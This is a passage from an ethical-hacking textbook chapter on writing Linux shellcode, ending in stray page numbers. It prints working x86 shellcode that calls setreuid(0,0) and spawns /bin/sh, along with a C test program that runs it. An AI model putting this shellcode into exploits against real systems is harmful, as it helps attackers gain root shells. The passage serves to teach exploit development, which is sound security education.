If there are any NULL characters, the shellcode
will fail when we place it into a string for injection during an exploit.
NOTE The output of objdump is provided in AT&T (gas) format. As
discussed in Chapter 6,we can easily convert between the two formats (gas
and nasm). A close comparison between the code we wrote and the
provided gas format assembly shows no difference.
Testing the Shellcode
To ensure that our shellcode will execute when contained in a string, we can craft the following
test program. Notice how the string (sc) may be broken into separate lines, one
for each assembly instruction. This aids with understanding and is a good habit to get
into.
$ cat sc2.c
char sc[] = //white space, such as carriage returns don't matter
// setreuid(0,0)
"\x31\xc0" // xor %eax,%eax
"\xb0\x46" // mov $0x46,%al
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xcd\x80" // int $0x80
// spawn shellcode with execve
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
Chapter 10: Writing Linux Shellcode
219
PART III
Gray Hat Hacking: The Ethical Hacker??™s Handbook
220
"\x31\xd2" // xor %edx,%edx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80 (;)terminates the string
main()
{
void (*fp) (void); // declare a function pointer, fp
fp = (void *)sc; // set the address of fp to our shellcode
fp(); // execute the function (our shellcode)
}
This program first places the hex opcodes (shellcode) into a buffer called sc[].
Pages:
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422